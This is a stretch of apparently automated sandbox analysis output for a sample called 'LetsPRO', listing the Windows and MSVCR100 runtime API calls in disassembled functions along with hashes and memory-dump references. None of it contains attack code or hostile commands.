                                        • API ID: free$InfoLocale_calloc_crt_malloc_crt$DecrementInterlocked___free_lconv_nummalloc
                                        • String ID:
                                        • API String ID: 2828155784-0
                                        • Opcode ID: 37dc5afdd1b450eb43e97f51bd70751a74a9793d5edcb20778bd445b88eed443
                                        • Instruction ID: de56846d4b0babe35001182140542e2d2be97ab16379d16b2ab4d87ca570b58f
                                        • Opcode Fuzzy Hash: 37dc5afdd1b450eb43e97f51bd70751a74a9793d5edcb20778bd445b88eed443
                                        • Instruction Fuzzy Hash: F75100B2B05314AFDB118FA8D840B9A77FDEF09704F2508AEE955DBA80E770D9408B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C94247E
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6C93D865,00000000,?,00000000,00000000), ref: 6C9424A9
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6C942504
                                          • Part of subcall function 6C942161: std::exception::exception.LIBCMT(6C941FF3,?,6C941FF3,00000001), ref: 6C942180
                                          • Part of subcall function 6C942161: _CxxThrowException.MSVCR100(?,6C9A0EAC,6C941FF3), ref: 6C942195
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6C942513
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6C942522
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942531
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C942540
                                        • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000006,00000005,00000003,00000002,00000001,?,00000000,00000000), ref: 6C94254F
                                        • GetCurrentThread.KERNEL32 ref: 6C94256D
                                        • GetThreadPriority.KERNEL32(00000000), ref: 6C942574
                                        • ??2@YAPAXI@Z.MSVCR100(00000838), ref: 6C942675
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Policy$Concurrency@@ElementKey@2@@Policy@SchedulerValue@$Thread$??2@CountCriticalCurrentExceptionH_prolog3InitializePrioritySectionSpinThrowstd::exception::exception
                                        • String ID:
                                        • API String ID: 138514572-0
                                        • Opcode ID: 1129b0bbacb61b5f2f2a297c7ce9ece1801b20b351b51a3b6e80caa7a0a5ce9f
                                        • Instruction ID: fc9f26f4667647dd40205c7556665baaf39fa7ff5a804cd801668a4cdcc38feb
                                        • Opcode Fuzzy Hash: 1129b0bbacb61b5f2f2a297c7ce9ece1801b20b351b51a3b6e80caa7a0a5ce9f
                                        • Instruction Fuzzy Hash: 0061E4B1B04A02AFD708CF39C885B99FBA2BB59304F44C62ED56DC7B41DB70A5648B80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _calloc_crt.MSVCR100(00000008,00000001), ref: 6C97C0BE
                                        • _errno.MSVCR100 ref: 6C97C0CB
                                        • _calloc_crt.MSVCR100(000000D8,00000001), ref: 6C97C0E2
                                        • free.MSVCR100(00000000), ref: 6C97C0F0
                                        • _calloc_crt.MSVCR100(00000220,00000001), ref: 6C97C0FE
                                        • free.MSVCR100(00000000), ref: 6C97C10E
                                        • free.MSVCR100(00000000,00000000), ref: 6C97C114
                                        • __copytlocinfo_nolock.LIBCMT ref: 6C97C123
                                        • free.MSVCR100(00000000,00000000,00000000), ref: 6C97C149
                                        • free.MSVCR100(?), ref: 6C97C169
                                        • free.MSVCR100(00000000,00000000,00000000,?), ref: 6C97C17D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: free$_calloc_crt$__copytlocinfo_nolock_errno
                                        • String ID:
                                        • API String ID: 717730667-0
                                        • Opcode ID: a60ffe56a75a97b27774525b1762a531a3a4a1dd8491dc99b331375983bf75ae
                                        • Instruction ID: 2e5f3d556c9bccde447a9254d719ab95a1b9e805e755f78a9f8793510ef3bf2d
                                        • Opcode Fuzzy Hash: a60ffe56a75a97b27774525b1762a531a3a4a1dd8491dc99b331375983bf75ae
                                        • Instruction Fuzzy Hash: 0B21F935246600EBD7326F69D804A8B7BF5EF76758B20442DE48857F60DF31D944C6A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C94C4F5
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C94C500
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __set_flsgetvalue.MSVCR100 ref: 6C94C50B
                                        • _calloc_crt.MSVCR100(00000001,00000214), ref: 6C94C517
                                        • _getptd.MSVCR100 ref: 6C94C524
                                        • _initptd.MSVCR100(00000000,?), ref: 6C94C52D
                                        • CreateThread.KERNEL32(00000000,?,6C94C48C,00000000,00000004,00000000), ref: 6C94C54B
                                        • ResumeThread.KERNEL32(00000000), ref: 6C94C55B
                                        • GetLastError.KERNEL32 ref: 6C94C566
                                        • free.MSVCR100(00000000), ref: 6C94C56F
                                        • __dosmaperr.LIBCMT(00000000), ref: 6C94C57A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Thread$CreateErrorLastResume__dosmaperr__set_flsgetvalue_calloc_crt_errno_getptd_initptd_invalid_parameter_invalid_parameter_noinfofree
                                        • String ID:
                                        • API String ID: 697002476-0
                                        • Opcode ID: ee61d4d8ea3d309f87b65503edfa3e1f240249169ad36f63a14b2319e8043164
                                        • Instruction ID: 37299f8f807ab3557969f498c401eb99ecb60afd69a8b903b2a0f4ee6f13888b
                                        • Opcode Fuzzy Hash: ee61d4d8ea3d309f87b65503edfa3e1f240249169ad36f63a14b2319e8043164
                                        • Instruction Fuzzy Hash: D411C6767057406FD7216AB59C44E9E3FA8DFA277CB204619F52897AC0DF71C40886A4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __cftof__forcdecpt_l_strlenfree
                                        • String ID: @$g
                                        • API String ID: 2465213841-2917482895
                                        • Opcode ID: bb086ce98e433d366670709ded0591de37edffc8ab9060ff0bc43aafe08da377
                                        • Instruction ID: 38e5f4904cb6194871c5b7f00e09b1441a29ae91ea746b35ad59c285d4b87779
                                        • Opcode Fuzzy Hash: bb086ce98e433d366670709ded0591de37edffc8ab9060ff0bc43aafe08da377
                                        • Instruction Fuzzy Hash: 1BF17B71E4962D8ADB208F58CC887D8B7B8BB5531CF2402DED818A6A51D774DBC5CF88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __aulldvrm__forcdecpt_l_get_printf_count_output_strlenfree
                                        • String ID: @$g
                                        • API String ID: 1547650701-2917482895
                                        • Opcode ID: cbfae9653b67d6fbdc2ffba7113b25efc8c4dec8b5552074f567010558b281ca
                                        • Instruction ID: 5756d0bb6c35bf7c9f96791f9c6e763af87a6ebe0a54c173fff52a9c60f8c5af
                                        • Opcode Fuzzy Hash: cbfae9653b67d6fbdc2ffba7113b25efc8c4dec8b5552074f567010558b281ca
                                        • Instruction Fuzzy Hash: 29B16A72A4926D8FDB208B54CC887D9B7B8AB5931CF2002DDD818A6A51D774DFC5CF88
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _lock.MSVCR100(00000007,6C912568,0000000C), ref: 6C9124CA
                                          • Part of subcall function 6C900940: EnterCriticalSection.KERNEL32(00000001,00000001,?,6C901F15,0000000D), ref: 6C90095B
                                        • _wcslen.LIBCMT(00000000,6C912568,0000000C), ref: 6C912521
                                        • wcscpy_s.MSVCR100(?,?,00000000,6C912568,0000000C), ref: 6C91253F
                                        • _errno.MSVCR100(6C912568,0000000C), ref: 6C9308F4
                                        • _invalid_parameter_noinfo.MSVCR100(6C912568,0000000C), ref: 6C9308FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CriticalEnterSection_errno_invalid_parameter_noinfo_lock_wcslenwcscpy_s
                                        • String ID: "
                                        • API String ID: 173085347-123907689
                                        • Opcode ID: f974e7bfd2a1167dcc1785e279ad4977d2e013bd01a1f6562289bedd3a8541f9
                                        • Instruction ID: d5d938ef553173399ecd69cd669f60ff3682405135bd0ed6ab165c0cc8f3a2b7
                                        • Opcode Fuzzy Hash: f974e7bfd2a1167dcc1785e279ad4977d2e013bd01a1f6562289bedd3a8541f9
                                        • Instruction Fuzzy Hash: 99212571A0968EDBDF10AFA888C94DE73A4BF26308F20147DE524C7E40D730C5488B91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$CreateFrameInfo
                                        • String ID: csm
                                        • API String ID: 4181383844-1018135373
                                        • Opcode ID: 770d38184ddeb556a7aabc5642a0897efea376120a1b98ecef2a8e6bf5d8ab20
                                        • Instruction ID: 5aae47a6023858a464e04cbb9b759884b128afb98a16ff24a1312082b019c97e
                                        • Opcode Fuzzy Hash: 770d38184ddeb556a7aabc5642a0897efea376120a1b98ecef2a8e6bf5d8ab20
                                        • Instruction Fuzzy Hash: 44112735908604CFC7248F25C445BA977A8FF2172EF1A86ABC06DC7E51DB34E4499F85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • malloc.MSVCR100(?), ref: 6C902366
                                          • Part of subcall function 6C900263: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6C900B72,00000001,00000001,00000001,?,6C90A9B4,00000018,6C90A988,0000000C,6C927537), ref: 6C900293
                                        • _callnewh.MSVCR100(?), ref: 6C92F2F8
                                        • std::exception::exception.LIBCMT(?,00000001), ref: 6C92F32F
                                        • atexit.MSVCR100(6C9A0AC8,?,00000001), ref: 6C92F33F
                                        • std::exception::exception.LIBCMT(6C9A8518), ref: 6C92F349
                                        • _CxxThrowException.MSVCR100(?,6C90C8D8,6C9A8518), ref: 6C92F35A
                                        • _errno.MSVCR100 ref: 6C92F369
                                        • _errno.MSVCR100 ref: 6C92F376
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errnostd::exception::exception$AllocExceptionHeapThrow_callnewhatexitmalloc
                                        • String ID: bad allocation
                                        • API String ID: 2638965609-2104205924
                                        • Opcode ID: bb79e8304c7ef7d6525c10653fde29ceb2f87f8c632875a1c6b9ec1b0057aa50
                                        • Instruction ID: f3afb43c5d202e8a92e2e0d084983fab11b975b8ba674d3686a1310f078ec151
                                        • Opcode Fuzzy Hash: bb79e8304c7ef7d6525c10653fde29ceb2f87f8c632875a1c6b9ec1b0057aa50
                                        • Instruction Fuzzy Hash: 7401C031B0024AAADF48EBA4D8056DD7BBCAF61A5CB2410DDD800A2E90DB71DB45C795
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,?,?,00000000,00000000), ref: 6C9161B0
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000), ref: 6C916216
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,6C916317,00000000,00000000,00000000), ref: 6C91622F
                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,6C916317,00000000,00000000,00000000), ref: 6C916280
                                        • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 6C916294
                                        • _freea_s.MSVCR100(00000000), ref: 6C91629E
                                        • _freea_s.MSVCR100(00000000), ref: 6C9162A7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_freea_s$CompareString
                                        • String ID:
                                        • API String ID: 3891795400-0
                                        • Opcode ID: 9f9e82713f08cb06b74dc484003d9fdbfc9931d7a2c87de88d0a30b5568eb81d
                                        • Instruction ID: 61da8d153c378479b184172faa93605e3fff6e3f1d1b5e0beaf0207a755d98af
                                        • Opcode Fuzzy Hash: 9f9e82713f08cb06b74dc484003d9fdbfc9931d7a2c87de88d0a30b5568eb81d
                                        • Instruction Fuzzy Hash: A881E532E0929A9FDF118E68CC42BEE3AB9DF46328F241155E824E7ED1C775C954CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000100,00000001,00000000,?,?,?,?,?,?,?), ref: 6C9061B8
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 6C90621B
                                        • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 6C906237
                                        • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 6C9062A1
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 6C9062C0
                                        • _freea_s.MSVCR100(00000000), ref: 6C9062CA
                                        • _freea_s.MSVCR100(?), ref: 6C9062D3
                                        • malloc.MSVCR100(00000008), ref: 6C930D89
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$String_freea_s$malloc
                                        • String ID:
                                        • API String ID: 1406006131-0
                                        • Opcode ID: 7e18af288520b9adcca9776ec35bbd4456ab84d35ddb95c3622bb770d31c1d4e
                                        • Instruction ID: 381cb147d4546b59f677b11cf007d8170de6aeacebc9bf320cbb40b9b2f8f778
                                        • Opcode Fuzzy Hash: 7e18af288520b9adcca9776ec35bbd4456ab84d35ddb95c3622bb770d31c1d4e
                                        • Instruction Fuzzy Hash: 39519372A0115AAFDF018F98CC809EE7BBAFF49358F20452DF924D6960D731D990DB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C940D5A
                                        • EnterCriticalSection.KERNEL32(?,00000010,6C938CAB,00000000,?,6C940B58,?,?,?,00000000), ref: 6C940D6F
                                        • ??2@YAPAXI@Z.MSVCR100(0000000C), ref: 6C940DAF
                                        • ??2@YAPAXI@Z.MSVCR100(00000120), ref: 6C940E02
                                        • _memset.LIBCMT(00000000,00000000,00000120), ref: 6C940E14
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6C940E39
                                        • _memset.LIBCMT(00000020,00000000,00000100), ref: 6C940E4D
                                        • SetEvent.KERNEL32(?), ref: 6C940EF4
                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C940F01
                                        • CloseHandle.KERNEL32(00000000), ref: 6C940F25
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ??2@CriticalEventSection_memset$CloseCreateEnterH_prolog3HandleLeave
                                        • String ID:
                                        • API String ID: 3129499143-0
                                        • Opcode ID: 18e115b76167ca5ae73253ec72b2170e7b3ca294d0c3cf93eb7e504cb0f9b0e7
                                        • Instruction ID: 4d0fcc09d464d8f14b9786d71892798c295cd5f48d531323d2192d5e1e8e3cce
                                        • Opcode Fuzzy Hash: 18e115b76167ca5ae73253ec72b2170e7b3ca294d0c3cf93eb7e504cb0f9b0e7
                                        • Instruction Fuzzy Hash: 50514770A007429FD728CF68C484BAABBF4BF19718F10C56DE49A9BB50D730E955CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95C27E
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95C289
                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,000000FF,?,?,?), ref: 6C95C2EB
                                        • GetLastError.KERNEL32 ref: 6C95C2F5
                                        • _isleadbyte_l.MSVCR100(?,?), ref: 6C95C31B
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 6C95C346
                                        • _errno.MSVCR100 ref: 6C95C34C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide_errno$ErrorLast_invalid_parameter_noinfo_isleadbyte_l
                                        • String ID:
                                        • API String ID: 4049637251-0
                                        • Opcode ID: 124cecf4e57798e8ba8ac7e54b9a537021d64589ef1eb5211cd8b54e6e9f45e5
                                        • Instruction ID: 1bc470d1e1521e96cd2b9d32b7af333cbbe6e2a120ab08936de5e47d100f5782
                                        • Opcode Fuzzy Hash: 124cecf4e57798e8ba8ac7e54b9a537021d64589ef1eb5211cd8b54e6e9f45e5
                                        • Instruction Fuzzy Hash: 1941E730504249EFDF12EF69CC84B9E3BB8FF4A368FA44255E4609ADA1D731C561C761
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000080,00000000,6C9A45D0,00000001,?,?,00000000,?,?,?,?,6C9A45D0,?), ref: 6C91074B
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 626452242-0
                                        • Opcode ID: 83e5bfd85721073f49e0b1fecea1fba7a20b49e45748b1b70b6ad1eb4220badf
                                        • Instruction ID: 411da23f0cadcfe698ee8b30a78c6b2f186be42502805544535156bd9c63f3d4
                                        • Opcode Fuzzy Hash: 83e5bfd85721073f49e0b1fecea1fba7a20b49e45748b1b70b6ad1eb4220badf
                                        • Instruction Fuzzy Hash: B2412733905189DFDB109F68C8C49ED3BBCEF02B58B100269E5A48BD94DF35CD458B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • _errno.MSVCR100 ref: 6C95A326
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95A330
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _get_timezone.MSVCR100(?), ref: 6C95A351
                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6C95A377
                                        • __aulldiv.LIBCMT ref: 6C95A391
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,23C34600,00000000), ref: 6C95A3B9
                                        • __aulldiv.LIBCMT ref: 6C95A427
                                        • __aullrem.LIBCMT ref: 6C95A435
                                        • __aulldiv.LIBCMT ref: 6C95A453
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmp
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Time__aulldiv$FileInformationSystemZone__aullrem_errno_get_timezone_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1439004929-0
                                        • Opcode ID: c9b222e78e57c517f1438f77adc0d55b498dfdcf54ccfcbf06fad9a670df6605
                                        • Instruction ID: af3ec4b28bb38f7bed64f867db5b49e2eb12428152251988cf6681d3d067e183
                                        • Opcode Fuzzy Hash: c9b222e78e57c517f1438f77adc0d55b498dfdcf54ccfcbf06fad9a670df6605
                                        • Instruction Fuzzy Hash: 0D41B671A04308DEDB20DFA5DC44F9E77B9FF55718F20454AE21893A80DB70D984CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C948EBA
                                          • Part of subcall function 6C942477: __EH_prolog3.LIBCMT ref: 6C94247E
                                          • Part of subcall function 6C942477: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,00000000,6C93D865,00000000,?,00000000,00000000), ref: 6C9424A9
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000001,?,00000000,00000000), ref: 6C942504
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000001,?,00000000,00000000), ref: 6C942513
                                          • Part of subcall function 6C942477: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000003,00000002,00000001,?,00000000,00000000), ref: 6C942522
